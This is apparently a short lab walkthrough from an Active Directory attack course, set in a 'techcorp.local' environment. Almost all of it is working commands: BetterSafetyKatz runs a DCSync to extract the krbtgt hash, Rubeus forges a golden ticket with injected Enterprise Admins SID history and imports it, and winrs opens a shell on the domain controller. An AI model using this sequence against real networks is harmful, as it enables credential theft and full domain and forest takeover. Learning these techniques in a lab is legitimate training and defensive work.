Let’s Extract the us\krbtgt hash

.\\BetterSafetyKatz.exe "lsadump::dcsync /user:us\\krbtgt /domain:us.techcorp.local" "exit"

Now let’s get a golden ticket and inject the SID History in it

.\\Rubeus.exe golden /user:Administrator /sid:S-1-5-21-210670787-2521448726-163245708 /groups:513 /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /domain:us.techcorp.local /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /ptt

Ticket is imported let’s list it to validate

klist

Now let’s login to the techcorp-dc

winrs -r:techcorp-dc cmd